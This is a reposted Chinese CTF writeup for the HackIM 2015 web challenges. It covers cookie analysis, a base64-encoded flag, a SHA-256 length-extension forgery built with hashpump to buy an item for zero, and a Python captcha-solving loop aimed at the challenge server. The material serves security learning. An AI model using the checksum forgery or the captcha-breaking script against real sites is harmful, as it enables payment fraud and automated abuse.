HackIM web关writeup

最新推荐文章于 2024-10-14 00:28:24 发布
最新推荐文章于 2024-10-14 00:28:24 发布
阅读量199 收藏
点赞数
文章标签: php python
原文链接:http://www.cnblogs.com/HacTF/p/6790776.html
版权

Web100

访问页面将看到下面的错误

t017d952f9c5004cb17.png

在burp里使用request / response查看有没有什么不正常的地方。如下图所示,在返回的数据包里被设置了两次不同的PHPSESSID。

t019651e50248c1f9cb.png

如果我把PHPSESSID改成第一个去请求会怎么样呢?当然没有那么简单,修改之后我发现页面只有“Error Code”有改变。

由于PHPSESSID一直在改变,我把每次返回的第一个PHPSESSID作为下一次请求的PHPSESSID去尝试,burp的Intruder可以实现。

t01ba6c91126b1513db.png

t01bd5df4c3344b09b2.png

t01787e88d301c6ed7b.png

Attack几秒钟之后,我发现返回的Error Code开始重复了,于是我把他们整理到一起。

t01eca3aac256d98770.png

很奇怪的一串字符,但是有点像base64加密,试一下。

1
2
root@kali:~ # echo TnVsbGNvbkdvYTIwMTVAV0VCMDAxMTAw | base64 -d
NullconGoa2015@WEB001100

所以flag是flag{NullconGoa2015@WEB001100}

Web300

访问页面后出现

“Find the keys to your home”和一个到loop.php的超链接

访问连接,里面是一个form表单,还有一个房子的图片。

同时还有个提示<!-- A place to loo[k]::back. -->

loo[k]::back有点像ipv6的格式,ipv6的环回接口(loopback)是::1, or 0:0:0:0:0:0:0:1,这也是这道题的flag。

好吧,虽然不像是一道web题,但我确实是这么解开的。

Web400

以0的价格购买这个商品

打开网页出现下面的页面:

https://i-blog.csdnimg.cn/blog_migrate/db09fe90bd2bd2adb084169ae42e5cb7.png

点击buy之后会有表单提交,源码如下

1
2
3
4
5
< form  action = checkout .php  method = POST >
          < input  type = hidden  name = msg  value = "Nullcon2015%7Ccorporate%7C10999" >< br >
          < input  type = hidden  name = checksum  value = "568fe78b29ac377a58ae1fbf02b4d1a158e605b3897916227e4b3ecfc78973db" >< br >
         < input  type = submit  value = Buy >
      </ form >

既然要以0的价格购买,我们就要把price改成0,但是我们没法直接修改,因为checksum做了校验。

查看页面源代码,发现下面的注释

1
2
3
4
5
6
7
<!-- 
     if( $checksum === hash("sha256",$secretkey . $msg))   // secretkey is XXXXXXXXXXXXXXXXXXX    :-P
     {
       // Success; :)
     }
   ?> 
    -->

这是length extension 攻击,如果你知道message和MAC,只需再知道key的长度,尽管不知道key的值,也能在message后面添加信息并计算出相应MAC。

使用hashpump来生成一个checksum

token: Nullcon2015|corporate|10999%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01p|0

checksum: a2319d6945201a4b9fd67f077248faff2b735297cca2ac10762af65b2c2dca48

提交之后获得key   

1
2
3
4
5
6
7
8
9
10
HTTP/1.1 200 OK
     Date: Fri, 09 Jan 2015 21:08:38 GMT
     Server: Apache/2.4.7 (Ubuntu)
     X-Powered-By: PHP/5.5.9-1ubuntu4.5
     Vary: Accept-Encoding
     Content-Length: 114
     Keep-Alive: timeout=5, max=100
     Connection: Keep-Alive
     Content-Type: text/html
     < h1 > Checkout </ h1 >Congratualtion You bought Nullcon Pass in ZERO rupee. See you at Nullcon!Flag is fl@g_*2o15}

 

Web500

唯一获得的提示就是“Break the Captcha”

访问页面

https://i-blog.csdnimg.cn/blog_migrate/a9076bd2aebda2dc76cdbe0e3feb8a11.png

就是说需要我们破解验证码

下面是我的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/usr/bin/python
__author__  =  "@_SaxX_"
import  os, requests, commands, re
=  requests.session()
url  =  "http://54.165.191.231/"
s.get(url  +  "captcha.php" )
while  True :
     open ( 'captcha.png' 'wb' ).write( s.get(url  +  "imagedemo.php" ).content )
     os.system( 'convert captcha.png -compress none -threshold 16% img.png' )
     captcha  =  commands.getoutput( "gocr -i img.png" ).strip()
     response  =  s.post(url  +  "verify.php" , { 'solution'  : captcha}).text
     flag  =  re.findall( 'Score :(.*)' , response)[ 0 ].rstrip()
     if  not  str (flag).isdigit():
         print  "[+] Flag: %s"  % flag
         break
print  "[%s] Sending Captcha=%s ... " % (flag, captcha)

t015982e541ef1cdcc2.png

https://i-blog.csdnimg.cn/blog_migrate/bfabe05307adf69866fbbb2d1609178c.png

执行之后出现flag

 

原文链接:https://ctf-team.vulnhub.com/write-ups/hackim/

 

flag{H@CKIM_C@pTcha!09022015}本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。

 

转载于:https://www.cnblogs.com/HacTF/p/6790776.html

anrao3094
关注
Dest0g3 520迎新赛 writeup (misc部分 + web部分)
ShenZ的博客
05-30 3897
Dest0g3 520迎新赛 Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius EasyWord EasyEncode Python_jail rookie hacker-1 rookie hacker-2 4096 EasySSTI phpdest EasyPHP SimpleRCE funny_upload middle PharPOP 1.phar的上传与触发 2.POP链 NodeSoEasy ezip Really Easy Sql
BUUCTF刷题第二周
Qianzshuo的博客
10-04 1005
第二周wireshakeasycap另一个世界被劫持的神秘礼物数据包中的线索 wireshak 题目给了提示,将下载的pcap丢到wireshark里面,发现 查看 得到flag easycap 打开压缩包发现是一个pcap,丢到wireshark中,追踪第一个包,直接得到flag 另一个世界 用winhex查看,发现最后有一串二进制,将其转换成ascii 被劫持的神秘礼物 pcapng文件,用wireshark打开,查看http包,根据提示将账号密码连接起来,然后md5加密 数据包中的线索 用 wires
hackim-2020:Nullcon的HackIM 2020挑战的来源
03-09
hackim-2020 HackIM 2020面临的所有挑战的来源
GE-F650产品说明书(中文版).pdf
10-31
GE-F650产品说明书(中文版)pdf,GE-F650产品说明书(中文版)
安全专家发现GE Multilin SR的一个键漏洞对全球电网构成严重威胁。
05-01 568
A team of researchers from New York University has found a serious vulnerability in some of GE Multilin SR protection relays that poses a serious threat to power grid.来自纽约大学的一组研究人员发现一些GE Multilin SR保护继
SQL注入搞事情(连载一)
04-27 536
SQL注入搞事情概述(连载一)写在最前面!为了有个合理的训练计划,山人准备长期开放自己的训练计划以及内容以供大家参考。山人专业是信息对抗技术,不是web方向的博客保证句句手打,如有问题请及时小窗。这章主要是讲讲什么事sql注入,之后的连载会涉及到注入工具的解析,实战sqllab,dvwa,xvwa等平台的注入,CTF的注入题型和一些实战的演练。什么是SQL注入不管用什么语言编写的Web应用,它们都用
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
负载均衡:x-forward-for获取客户端真实ip
weixin_30667649的博客
03-04 1995
先来看一下X-Forwarded-For的定义: X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。它不是RFC中定义的标准请求头信息,在squid缓存代理服务器开发文档中可以找到该项的详细介绍。标准格式如下: X-Forwarded-For: client1, proxy1,...
bugku之一个普通的压缩包(xp0intCTF) writeup
Evil_invisible的博客
07-20 3210
一个普通的压缩包 一个zip.rar文件,解压得flag.rar,再解压得flag.txt,查看flag.txt内容及属性,均无线索,可推测重点在flag.rar。 拖到010editor查看,将A8 3C 7A改成A8 3C 74修复成功。 在解压flag.rar,即可得到secret.png,一个白白的图片。 拖到010editor看下发现是gif文件,改下后缀。 secret....
BugkuCTF(代码审计) WriteUp
CallMeSa1tyFish的博客
08-06 3728
代码审计部分 extract变量覆盖 题目 &amp;amp;amp;lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content){ echo'flag{xxx}'; }else{ ...
bugku Web8
rommel的博客
08-28 5361
extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "This is flag:" ." $flag"; } else { echo "sorry!"; } } ?> 根据题目的提示我们猜测目录下有txt文件,于是我们试出了http:
bugku 新平台 web1 writeup
sx234com的博客
04-10 1714
题目: 看题型主要出题思路是变量覆盖+RFI(远程文件包含) 知识点链接: 变量覆盖:https://www.cnblogs.com/xiaozi/p/7768580.html 远程文件包含:https://blog.csdn.net/sx234com/article/details/88994605 解题过程代码分析;自己按照上面的代码写出来验证一下是最好的解题思路。 &l...
每日作业
qq_39936993的博客
01-31 565
各种绕过   highlight_file('flag.php');  $_GET['id'] = urldecode($_GET['id']);  $flag = 'flag{xxxxxxxxxxxxxxxxxx}';  if (isset($_GET['uname']) and isset($_POST['passwd'])) {      if ($_GET['uname']
Request库学习
weixin_30809333的博客
01-27 99
0x00前言 这库让我爱上了python 碉堡! 开心去学了一些python,然后就来学这个时候神库~~ 资料来源:http://cn.python-requests.org/en/latest/user/quickstart.html 写上自己学习笔记 加上importrequests 就可以开心的用这个库了! ++++++++++++++++++++++++++++...
pseudorandom nullcon-hackim-2016 攻防世界
re1wn
05-19 5932
pseudorandom nullcon-hackim-2016 攻防世界
CTF-练习平台 Web writeup By Assassin [暂时完结]
热门推荐
Assassin
04-06 7万+
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#
bugku web wp(一)
weixin_30586085的博客
10-29 105
1.签到题 加群看公告拿flag 2.web2 右键审查元素,就可以看到flag 3.文件上传测试 抓包,修改文件类型 4.计算题 右键源代码,点击这个JS 5.web基础$_GET get传值 6.web基础$_POST 本人基础不怎么好,网上找了一段py代码 #!/usr/bin/python# -*- coding: UTF-8 -...
ctf论剑场 web20被坑的地方
qq_41255416的博客
08-31 528
今天做了一道脚本题,但是被某一个语句坑的很惨,让我误以为我的脚本很错误,很是难受,但是初学python没有意识到,所以在这里记录一下. 下面放上有问题的脚本: ...
【OSCP Proving Grounds 靶场系列】Slort
最新发布
Eason_LYC安全白帽子的成长博客
10-14 364
【OSCP Proving Grounds 靶场系列】Slort
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值